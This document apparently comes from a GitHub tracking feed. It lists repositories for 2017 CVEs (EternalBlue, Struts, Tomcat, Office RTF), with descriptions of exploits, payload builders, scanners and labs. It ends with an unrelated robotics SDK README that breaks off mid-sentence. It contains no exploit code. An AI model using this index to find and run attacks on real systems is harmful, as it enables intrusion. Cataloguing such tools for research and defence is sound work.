**None** : [AvishkaSenadheera/CVE-2017-9805---Documentation---IT19143378](https://api.github.com/repos/AvishkaSenadheera/CVE-2017-9805---Documentation---IT19143378) create time: 2020-05-12T17:53:57Z

**Eternalblue Exploit Was Developed By The NSA Which Is The National Security Agency In United States. Essentially What Happened Or How It Was Released Is That There Were Few Testimonies From NSA Employees, And It Was Leaked By The Shadow Brokers Hacker Group On April 14th 2017.And Then It Was Utilized Worldwide For The WANNACRY Ransomware attack and it was used to share the ransomware all around the world. Eternalblue Exploit a vulnerability in Microsoft’s implementation of the Server Message Block (SMB) protocol. And the exploit is denoted under the entry CVE 2017 0 144.The vulnerability exists because the SMB version 1 (SMBv1) server in various versions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to execute arbitrary code on the target computer.it is exist in different versions of windows and essentially what it does is it mishandles especially crafted packets that are been sent from the remote hackers and allowing this hackers to execute arbitrary code on the target computer. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption** : [477Hashini/-Exploitation-Of-EternalBlue-DoublePulsar-Windows-7-64bit--Demo](https://api.github.com/repos/477Hashini/-Exploitation-Of-EternalBlue-DoublePulsar-Windows-7-64bit--Demo) create time: 2020-05-13T08:46:47Z

**CVE-2017-8759 | .NET Framework Remote Code Execution Vulnerability** : [GayashanM/OHTS](https://api.github.com/repos/GayashanM/OHTS) create time: 2020-05-12T16:00:39Z

**Struts 2.5 - 2.5.12 REST Plugin XStream RCE** : [wifido/CVE-2017-9805-Exploit](https://api.github.com/repos/wifido/CVE-2017-9805-Exploit) create time: 2020-06-11T07:36:56Z

**Exploit for CVE-2017-11826** : [thatskriptkid/CVE-2017-11826](https://api.github.com/repos/thatskriptkid/CVE-2017-11826) create time: 2018-02-09T17:20:53Z

**None** : [yukar1z0e/CVE-2017-15944](https://api.github.com/repos/yukar1z0e/CVE-2017-15944) create time: 2020-05-29T03:04:18Z

**The tool is used to detect whether a server is vulnerable to Nginx Remote Integer Overflow CVE (2017-7529)** : [devansh3008/Cve_Finder_2017-7529](https://api.github.com/repos/devansh3008/Cve_Finder_2017-7529) create time: 2020-05-29T07:22:43Z

**jenkins CVE-2017-1000353 POC** : [vulhub/CVE-2017-1000353](https://api.github.com/repos/vulhub/CVE-2017-1000353) create time: 2019-04-12T13:24:26Z

**An example exploit for CVE-2017-7376** : [brahmstaedt/libxml2-exploit](https://api.github.com/repos/brahmstaedt/libxml2-exploit) create time: 2020-06-11T06:55:32Z

**Exploit for NGiX 1.6.2 Remote Integer Overflow Vulnerability CVE-2017-7529** : [cyberk1w1/CVE-2017-7529](https://api.github.com/repos/cyberk1w1/CVE-2017-7529) create time: 2020-06-13T12:11:19Z

**🚀 Server Directory Traversal at Huawei HG255s ☄️ - CVE-2017-17309 🚀** : [exploit-labs/huawei_hg255s_exploit](https://api.github.com/repos/exploit-labs/huawei_hg255s_exploit) create time: 2017-10-23T13:57:27Z

**None** : [cyberharsh/Php-unit-CVE-2017-9841](https://api.github.com/repos/cyberharsh/Php-unit-CVE-2017-9841) create time: 2020-06-24T09:37:04Z

**None** : [cyberharsh/Tomcat-CVE-2017-12615](https://api.github.com/repos/cyberharsh/Tomcat-CVE-2017-12615) create time: 2020-06-24T21:14:41Z

**PoC CVE-2017-5123 - LPE - Bypassing SMEP/SMAP. No KASLR** : [c3r34lk1ll3r/CVE-2017-5123](https://api.github.com/repos/c3r34lk1ll3r/CVE-2017-5123) create time: 2020-05-08T15:10:38Z

**None** : [cyberharsh/nginx-CVE-2017-7529](https://api.github.com/repos/cyberharsh/nginx-CVE-2017-7529) create time: 2020-06-24T05:57:33Z

**POC checks for CVE-2017-6558, CVE-2017-14243 & CVE-2017-14244** : [GemGeorge/iBall-UTStar-CVEChecker](https://api.github.com/repos/GemGeorge/iBall-UTStar-CVEChecker) create time: 2017-10-03T09:16:57Z

**The DGS-1510 Websmart switch series firmware has been found to have security vulneratiblies. The vulnerabilities include unauthenticated command bypass and unauthenticated information disclosure.** : [varangamin/CVE-2017-6206](https://api.github.com/repos/varangamin/CVE-2017-6206) create time: 2017-03-20T17:24:22Z

**None** : [nondejus/CVE-2017-12842](https://api.github.com/repos/nondejus/CVE-2017-12842) create time: 2020-07-17T13:52:59Z

**A coordinated disclosure and security advisory on Fermax Intercom DTML Injection vulneraiblity. Special thanks to Fermax International for prompt responses and allowing details to be publicized.** : [breaktoprotect/CVE-2017-16778-Intercom-DTMF-Injection](https://api.github.com/repos/breaktoprotect/CVE-2017-16778-Intercom-DTMF-Injection) create time: 2019-12-20T07:20:50Z

**Simple detection tool for Blueborne vulnerability found on Android devices --- CVE-2017-0781. ** : [mjancek/BlueborneDetection](https://api.github.com/repos/mjancek/BlueborneDetection) create time: 2020-07-30T21:06:19Z

**修改IP地址即可实现命令执行** : [guanjivip/CVE-2017-8046](https://api.github.com/repos/guanjivip/CVE-2017-8046) create time: 2020-08-01T05:15:42Z

**Hikvision camera CVE-2017-7921-EXP** : [JrDw0/CVE-2017-7921-EXP](https://api.github.com/repos/JrDw0/CVE-2017-7921-EXP) create time: 2020-04-27T11:49:40Z

**None** : [cyberharsh/GoAhead-cve---2017--17562](https://api.github.com/repos/cyberharsh/GoAhead-cve---2017--17562) create time: 2020-06-24T21:06:28Z

**None** : [cyberharsh/Apache-couchdb-CVE-2017-12635](https://api.github.com/repos/cyberharsh/Apache-couchdb-CVE-2017-12635) create time: 2020-06-19T20:48:28Z

**CVE-2017-8570 Exp改造及样本分析** : [erfze/CVE-2017-8570](https://api.github.com/repos/erfze/CVE-2017-8570) create time: 2020-08-06T09:12:37Z

**CVE-2017-8570 Exp及利用样本分析** : [erfze/CVE-2017-0261](https://api.github.com/repos/erfze/CVE-2017-0261) create time: 2020-08-22T03:01:51Z

**Telerik UI for ASP.NET AJAX File upload and .NET deserialisation exploit (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935)** : [bao7uo/RAU_crypto](https://api.github.com/repos/bao7uo/RAU_crypto) create time: 2018-01-09T13:53:57Z

**None** : [Nacromencer/cve2017-0199-in-python](https://api.github.com/repos/Nacromencer/cve2017-0199-in-python) create time: 2020-08-25T20:40:35Z

**[CVE-2017-9822] DotNetNuke Cookie Deserialization Remote Code Execution (RCE)** : [murataydemir/CVE-2017-9822](https://api.github.com/repos/murataydemir/CVE-2017-9822) create time: 2020-08-28T12:45:44Z

**CVE 2017-9805** : [luc10/struts-rce-cve-2017-9805](https://api.github.com/repos/luc10/struts-rce-cve-2017-9805) create time: 2017-09-06T08:32:01Z

**PoC files for CVE-2017-15277, use with neex/gifoeb** : [tacticthreat/ImageMagick-CVE-2017-15277](https://api.github.com/repos/tacticthreat/ImageMagick-CVE-2017-15277) create time: 2019-01-15T01:20:44Z

**CVE-2017-13156-Janus复现** : [tea9/CVE-2017-13156-Janus](https://api.github.com/repos/tea9/CVE-2017-13156-Janus) create time: 2020-09-03T09:28:31Z

**Scans for nginx integer overflow vulnerability (CVE-2017-7529)** : [daehee/nginx-overflow](https://api.github.com/repos/daehee/nginx-overflow) create time: 2020-09-15T21:19:17Z

**None** : [devil2531/cve20177529](https://api.github.com/repos/devil2531/cve20177529) create time: 2020-09-26T07:47:29Z

**PoC code for CVE-2017-13253** : [tamirzb/CVE-2017-13253](https://api.github.com/repos/tamirzb/CVE-2017-13253) create time: 2018-03-12T16:06:21Z

**Java反序列化漏洞利用工具V1.0 Java反序列化相关漏洞的检查工具,采用JDK 1.8+NetBeans8.2开发,软件运行必须安装JDK 1.8或者以上版本。 支持:weblogic xml反序列化漏洞 CVE-2017-10271/CNVD-C-2019-48814/CVE-2019-2725检查。** : [shack2/javaserializetools](https://api.github.com/repos/shack2/javaserializetools) create time: 2018-09-13T09:44:18Z

**Primefaces <= 5.2.21, 5.3.8 or 6.0 - Remote Code Execution Exploit** : [pimps/CVE-2017-1000486](https://api.github.com/repos/pimps/CVE-2017-1000486) create time: 2018-09-03T03:11:24Z

**BlueBorne Exploits & Framework This repository contains a PoC code of various exploits for the BlueBorne vulnerabilities. Under 'android' exploits for the Android RCE vulnerability (CVE-2017-0781), and the SDP Information leak vulnerability (CVE-2017-0785) can be found. Under 'linux-bluez' exploits for the Linux-RCE vulnerability (CVE-2017-1000251) can be found (for Amazon Echo, and Samsung Gear S3). Under 'l2cap_infra' a general testing framework to send and receive raw l2cap messages (using scapy) can be found. Under 'nRF24_BDADDR_Sniffer' a tool to capture bluetooth mac addresses (BDADDR) over the air, using a nRF24L01 chip For more details on BlueBorne, you may read the full technical white paper available here: https://www.armis.com/blueborne/ In addition a several detailed blog posts on the exploitation of these vulnerability can be found here: https://www.armis.com/blog/ =============== Dependencies:** : [CrackSoft900/Blue-Borne](https://api.github.com/repos/CrackSoft900/Blue-Borne) create time: 2020-10-12T07:21:08Z

**None** : [stealth-ronin/CVE-2017-0199-PY-KIT](https://api.github.com/repos/stealth-ronin/CVE-2017-0199-PY-KIT) create time: 2020-10-18T20:24:38Z

**This would basically send smb1 (not smb2) packets to determine if a machine is vulnerable to CVE-2017-0143 (Etern-Blue for windows). (Work in progress)** : [6A0BCD80/Etern-blue-Windows-7-Checker](https://api.github.com/repos/6A0BCD80/Etern-blue-Windows-7-Checker) create time: 2020-10-07T06:19:45Z

**1day Exploit by sheisback** : [Sheisback/CVE-2017-11783](https://api.github.com/repos/Sheisback/CVE-2017-11783) create time: 2018-08-31T01:48:29Z

**(CVE-2017-5638) XworkStruts RCE Vuln test script** : [ludy-dev/XworkStruts-RCE](https://api.github.com/repos/ludy-dev/XworkStruts-RCE) create time: 2020-08-31T13:53:37Z

**(CVE-2017-9841) PHPUnit_eval-stdin_php Remote Code Execution** : [ludy-dev/PHPUnit_eval-stdin_RCE](https://api.github.com/repos/ludy-dev/PHPUnit_eval-stdin_RCE) create time: 2020-09-14T12:33:44Z

**A specially crafted IOCTL can be issued to the rzpnk.sys driver in Razer Synapse 2.20.15.1104 that is forwarded to ZwOpenProcess allowing a handle to be opened to an arbitrary process.** : [kkent030315/CVE-2017-9769](https://api.github.com/repos/kkent030315/CVE-2017-9769) create time: 2020-11-03T10:58:53Z

**None** : [HaoJame/CVE-2017-11882](https://api.github.com/repos/HaoJame/CVE-2017-11882) create time: 2020-11-10T04:13:53Z

**None** : [rvermeulen/apache-struts-cve-2017-9805](https://api.github.com/repos/rvermeulen/apache-struts-cve-2017-9805) create time: 2020-11-13T12:04:32Z

**generate RTF exploit payload. uses cve-2017-11882, cve-2017-8570, cve-2018-0802, and cve-2018-8174.** : [dcsync/rtfkit](https://api.github.com/repos/dcsync/rtfkit) create time: 2020-11-16T22:21:54Z

**Tool to try multiple paths for PHPunit RCE CVE-2017-9841** : [RandomRobbieBF/phpunit-brute](https://api.github.com/repos/RandomRobbieBF/phpunit-brute) create time: 2020-05-18T20:55:05Z

**CVE-2017-3506** : [Al1ex/CVE-2017-3506](https://api.github.com/repos/Al1ex/CVE-2017-3506) create time: 2020-11-18T01:50:47Z

**CVE-2017-10271** : [Al1ex/CVE-2017-10271](https://api.github.com/repos/Al1ex/CVE-2017-10271) create time: 2020-11-18T02:31:18Z

**None** : [Maskhe/rmi_cve20173241](https://api.github.com/repos/Maskhe/rmi_cve20173241) create time: 2020-03-12T10:37:20Z

**海康威视未授权访问检测poc及口令爆破** : [BurnyMcDull/CVE-2017-7921](https://api.github.com/repos/BurnyMcDull/CVE-2017-7921) create time: 2020-11-12T09:02:10Z

**None** : [Elbarbons/Attacco-ROCA-sulla-vulnerabilita-CVE-2017-15361](https://api.github.com/repos/Elbarbons/Attacco-ROCA-sulla-vulnerabilita-CVE-2017-15361) create time: 2020-11-02T14:12:37Z

**修复了源项目的一个bug,若能正常使用使用源项目即可** : [A403/CVE_2017_7921_EXP](https://api.github.com/repos/A403/CVE_2017_7921_EXP) create time: 2020-11-23T11:21:55Z

**Exploit script for Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805)** : [0x00-0x00/-CVE-2017-9805](https://api.github.com/repos/0x00-0x00/-CVE-2017-9805) create time: 2017-11-24T14:46:35Z

**weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14882、CVE-2020-14883** : [0xn0ne/weblogicScanner](https://api.github.com/repos/0xn0ne/weblogicScanner) create time: 2020-01-15T04:26:29Z

**Exploit script for Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805) ** : [jongmartinez/-CVE-2017-9805-](https://api.github.com/repos/jongmartinez/-CVE-2017-9805-) create time: 2020-11-28T00:00:37Z

**None** : [ossf-cve-benchmark/CVE-2017-0931](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-0931) create time: 2020-11-30T14:43:26Z

**None** : [ossf-cve-benchmark/CVE-2017-1000219](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-1000219) create time: 2020-11-30T14:52:17Z

**None** : [ossf-cve-benchmark/CVE-2017-15010](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-15010) create time: 2020-11-30T14:52:17Z

**None** : [ossf-cve-benchmark/CVE-2017-1001004](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-1001004) create time: 2020-11-30T14:52:17Z

**None** : [ossf-cve-benchmark/CVE-2017-1000006](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-1000006) create time: 2020-11-30T14:52:17Z

**None** : [ossf-cve-benchmark/CVE-2017-16023](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16023) create time: 2020-11-30T14:52:17Z

**None** : [ossf-cve-benchmark/CVE-2017-16006](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16006) create time: 2020-11-30T14:52:17Z

**None** : [ossf-cve-benchmark/CVE-2017-16018](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16018) create time: 2020-11-30T14:52:17Z

**None** : [ossf-cve-benchmark/CVE-2017-16029](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16029) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16084](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16084) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16014](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16014) create time: 2020-11-30T14:52:17Z

**None** : [ossf-cve-benchmark/CVE-2017-16003](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16003) create time: 2020-11-30T14:52:17Z

**None** : [ossf-cve-benchmark/CVE-2017-16011](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16011) create time: 2020-11-30T14:52:17Z

**None** : [ossf-cve-benchmark/CVE-2017-10910](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-10910) create time: 2020-11-30T14:52:17Z

**None** : [ossf-cve-benchmark/CVE-2017-16031](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16031) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16028](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16028) create time: 2020-11-30T14:52:17Z

**None** : [ossf-cve-benchmark/CVE-2017-1000427](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-1000427) create time: 2020-11-30T14:52:17Z

**None** : [ossf-cve-benchmark/CVE-2017-16034](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16034) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16082](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16082) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16026](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16026) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16042](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16042) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16098](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16098) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16117](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16117) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16087](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16087) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16043](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16043) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16083](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16083) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16119](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16119) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16107](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16107) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16137](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16137) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16114](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16114) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16100](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16100) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16138](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16138) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16224](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16224) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16118](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16118) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16877](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16877) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16226](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16226) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-5954](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-5954) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-18352](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-18352) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-18214](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-18214) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-18353](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-18353) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-16136](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16136) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-18635](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-18635) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2019-20174](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-20174) create time: 2020-12-01T09:18:58Z

**None** : [ActorExpose/CVE-2017-11882](https://api.github.com/repos/ActorExpose/CVE-2017-11882) create time: 2020-12-03T15:00:27Z

**PoC for CVE: 2017-5638 - Apache Struts2 S2-045** : [jongmartinez/CVE-2017-5638](https://api.github.com/repos/jongmartinez/CVE-2017-5638) create time: 2020-12-06T16:16:43Z

**None** : [ossf-cve-benchmark/CVE-2017-16030](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-16030) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-17461](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-17461) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-18077](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-18077) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-18354](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-18354) create time: 2020-11-30T14:52:18Z

**None** : [ossf-cve-benchmark/CVE-2017-18355](https://api.github.com/repos/ossf-cve-benchmark/CVE-2017-18355) create time: 2020-11-30T14:52:18Z

**Insecure Java Deserialization Lab** : [Ingenuity-Fainting-Goats/CVE-2017-7525-Jackson-Deserialization-Lab](https://api.github.com/repos/Ingenuity-Fainting-Goats/CVE-2017-7525-Jackson-Deserialization-Lab) create time: 2020-04-22T07:48:19Z

**Base64-based encryption oracle exploit for CVE-2017-9248 (Telerik UI for ASP.NET AJAX dialog handler)** : [bao7uo/dp_crypto](https://api.github.com/repos/bao7uo/dp_crypto) create time: 2018-01-16T00:23:34Z

**CVE-2017-11882(通杀Office 2003到2016)** : [littlebin404/CVE-2017-11882](https://api.github.com/repos/littlebin404/CVE-2017-11882) create time: 2019-08-14T11:55:00Z

**Supervisord远程命令执行漏洞脚本** : [yaunsky/CVE-2017-11610](https://api.github.com/repos/yaunsky/CVE-2017-11610) create time: 2020-12-22T09:08:49Z

**None** : [Abady0x/CVE-2017-16651](https://api.github.com/repos/Abady0x/CVE-2017-16651) create time: 2020-12-26T10:53:38Z

**Python implementation of Roundcube LFI (CVE-2017-16651)** : [stonepresto/CVE-2017-16651](https://api.github.com/repos/stonepresto/CVE-2017-16651) create time: 2021-01-06T01:46:39Z

**Hikvision IP camera access bypass exploit, developed by golang. ** : [MisakaMikato/cve-2017-7921-golang](https://api.github.com/repos/MisakaMikato/cve-2017-7921-golang) create time: 2020-11-13T04:15:31Z

**CVE-2017-16894 ** : [ahacker15/CVE-2017-16894](https://api.github.com/repos/ahacker15/CVE-2017-16894) create time: 2021-01-12T05:11:14Z

**CVE-2017-12615 任意文件写入exp,写入webshell** : [gardenWhy/CVE-2017-12615-EXP](https://api.github.com/repos/gardenWhy/CVE-2017-12615-EXP) create time: 2021-01-12T09:07:12Z

**PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.** : [z3ox1s/PHPUnit-CVE-2017-9841](https://api.github.com/repos/z3ox1s/PHPUnit-CVE-2017-9841) create time: 2021-01-14T09:40:41Z

**CVE-2017-7529 | nginx on the range 0.5.6 - 1.13.2** : [ninjabuster/exploit-nginx-1.10.3](https://api.github.com/repos/ninjabuster/exploit-nginx-1.10.3) create time: 2021-01-19T07:12:10Z

**CVE-2017-17485:Jackson-databind RCE** : [Al1ex/CVE-2017-17485](https://api.github.com/repos/Al1ex/CVE-2017-17485) create time: 2020-05-22T03:28:49Z

**Added Vulnerability Code in Python for Nginx Vulnerability (CVE-2017-7529)** : [fardeen-ahmed/Remote-Integer-Overflow-Vulnerability](https://api.github.com/repos/fardeen-ahmed/Remote-Integer-Overflow-Vulnerability) create time: 2021-01-20T15:24:10Z

**SignHere is implementation of CVE-2017-11882. SignHere is builder of malicious rtf document and VBScript payloads.** : [Retr0-code/SignHere](https://api.github.com/repos/Retr0-code/SignHere) create time: 2021-01-25T12:44:03Z

**👻CVE-2017-16995** : [ph4ntonn/CVE-2017-16995](https://api.github.com/repos/ph4ntonn/CVE-2017-16995) create time: 2021-01-28T09:32:04Z

**This python file will decrypt the configurationFile used by hikvision cameras vulnerable to CVE-2017-7921.** : [chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor](https://api.github.com/repos/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor) create time: 2021-01-29T16:08:35Z

**Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution for Python3** : [tyranteye666/tomcat-cve-2017-12617](https://api.github.com/repos/tyranteye666/tomcat-cve-2017-12617) create time: 2021-02-04T04:28:21Z

**CVE-2017-8917 - SQL injection Vulnerability Exploit in Joomla 3.7.0 ** : [stefanlucas/Exploit-Joomla](https://api.github.com/repos/stefanlucas/Exploit-Joomla) create time: 2017-11-19T16:50:39Z

**poc based on: https://github.com/emcalv/tivoli-poc** : [bcdannyboy/cve-2017-1635-PoC](https://api.github.com/repos/bcdannyboy/cve-2017-1635-PoC) create time: 2021-03-04T19:52:48Z

**struts2-rest-showcase 2.5.10** : [z3bd/CVE-2017-9805](https://api.github.com/repos/z3bd/CVE-2017-9805) create time: 2021-03-05T21:57:11Z

**NOTICE This repository contains the public FTC SDK for the SKYSTONE (2019-2020) competition season. If you are looking for the current season's FTC SDK software, please visit the new and permanent home of the public FTC SDK: FtcRobotController repository Welcome! This GitHub repository contains the source code that is used to build an Android app to control a FIRST Tech Challenge competition robot. To use this SDK, download/clone the entire project to your local computer. Getting Started If you are new to robotics or new to the FIRST Tech Challenge, then you should consider reviewing the FTC Blocks Tutorial to get familiar with how to use the control system: FTC Blocks Online Tutorial Even if you are an advanced Java programmer, it is helpful to start with the FTC Blocks tutorial, and then migrate to the OnBot Java Tool or to Android Studio afterwards. Downloading the Project If you are an Android Studio programmer, there are several ways to download this repo. Note that if you use the Blocks or OnBot Java Tool to program your robot, then you do not need to download this repository. If you are a git user, you can clone the most current version of the repository: git clone https://github.com/FIRST-Tech-Challenge/SKYSTONE.git Or, if you prefer, you can use the "Download Zip" button available through the main repository page. Downloading the project as a .ZIP file will keep the size of the download manageable. You can also download the project folder (as a .zip or .tar.gz archive file) from the Downloads subsection of the Releases page for this repository. Once you have downloaded and uncompressed (if needed) your folder, you can use Android Studio to import the folder ("Import project (Eclipse ADT, Gradle, etc.)"). Getting Help User Documentation and Tutorials FIRST maintains online documentation with information and tutorials on how to use the FIRST Tech Challenge software and robot control system. You can access this documentation using the following link: SKYSTONE Online Documentation Note that the online documentation is an "evergreen" document that is constantly being updated and edited. It contains the most current information about the FIRST Tech Challenge software and control system. Javadoc Reference Material The Javadoc reference documentation for the FTC SDK is now available online. Click on the following link to view the FTC SDK Javadoc documentation as a live website: FTC Javadoc Documentation Documentation for the FTC SDK is also included with this repository. There is a subfolder called "doc" which contains several subfolders: The folder "apk" contains the .apk files for the FTC Driver Station and FTC Robot Controller apps. The folder "javadoc" contains the JavaDoc user documentation for the FTC SDK. Online User Forum For technical questions regarding the Control System or the FTC SDK, please visit the FTC Technology forum: FTC Technology Forum Release Information Version 5.5 (20200824-090813) Version 5.5 requires Android Studio 4.0 or later. New features Adds support for calling custom Java classes from Blocks OpModes (fixes SkyStone issue #161). Classes must be in the org.firstinspires.ftc.teamcode package. Methods must be public static and have no more than 21 parameters. Parameters declared as OpMode, LinearOpMode, Telemetry, and HardwareMap are supported and the argument is provided automatically, regardless of the order of the parameters. On the block, the sockets for those parameters are automatically filled in. Parameters declared as char or java.lang.Character will accept any block that returns text and will only use the first character in the text. Parameters declared as boolean or java.lang.Boolean will accept any block that returns boolean. Parameters declared as byte, java.lang.Byte, short, java.lang.Short, int, java.lang.Integer, long, or java.lang.Long, will accept any block that returns a number and will round that value to the nearest whole number. Parameters declared as float, java.lang.Float, double, java.lang.Double will accept any block that returns a number. Adds telemetry API method for setting display format Classic Monospace HTML (certain tags only) Adds blocks support for switching cameras. Adds Blocks support for TensorFlow Object Detection with a custom model. Adds support for uploading a custom TensorFlow Object Detection model in the Manage page, which is especially useful for Blocks and OnBotJava users. Shows new Control Hub blink codes when the WiFi band is switched using the Control Hub's button (only possible on Control Hub OS 1.1.2) Adds new warnings which can be disabled in the Advanced RC Settings Mismatched app versions warning Unnecessary 2.4 GHz WiFi usage warning REV Hub is running outdated firmware (older than version 1.8.2) Adds support for Sony PS4 gamepad, and reworks how gamepads work on the Driver Station Removes preference which sets gamepad type based on driver position. Replaced with menu which allows specifying type for gamepads with unknown VID and PID Attempts to auto-detect gamepad type based on USB VID and PID If gamepad VID and PID is not known, use type specified by user for that VID and PID If gamepad VID and PID is not known AND the user has not specified a type for that VID and PID, an educated guess is made about how to map the gamepad Driver Station will now attempt to automatically recover from a gamepad disconnecting, and re-assign it to the position it was assigned to when it dropped If only one gamepad is assigned and it drops: it can be recovered If two gamepads are assigned, and have different VID/PID signatures, and only one drops: it will be recovered If two gamepads are assigned, and have different VID/PID signatures, and BOTH drop: both will be recovered If two gamepads are assigned, and have the same VID/PID signatures, and only one drops: it will be recovered If two gamepads are assigned, and have the same VID/PID signatures, and BOTH drop: neither will be recovered, because of the ambiguity of the gamepads when they re-appear on the USB bus. There is currently one known edge case: if there are two gamepads with the same VID/PID signature plugged in, but only one is assigned, and they BOTH drop, it's a 50-50 chance of which one will be chosen for automatic recovery to the assigned position: it is determined by whichever one is re-enumerated first by the USB bus controller. Adds landscape user interface to Driver Station New feature: practice timer with audio cues New feature (Control Hub only): wireless network connection strength indicator (0-5 bars) New feature (Control Hub only): tapping on the ping/channel display will switch to an alternate display showing radio RX dBm and link speed (tap again to switch back) The layout will NOT autorotate. You can switch the layout from the Driver Station's settings menu. Breaking changes Removes support for Android versions 4.4 through 5.1 (KitKat and Lollipop). The minSdkVersion is now 23. Removes the deprecated LinearOpMode methods waitOneFullHardwareCycle() and waitForNextHardwareCycle() Enhancements Handles RS485 address of Control Hub automatically The Control Hub is automatically given a reserved address Existing configuration files will continue to work All addresses in the range of 1-10 are still available for Expansion Hubs The Control Hub light will now 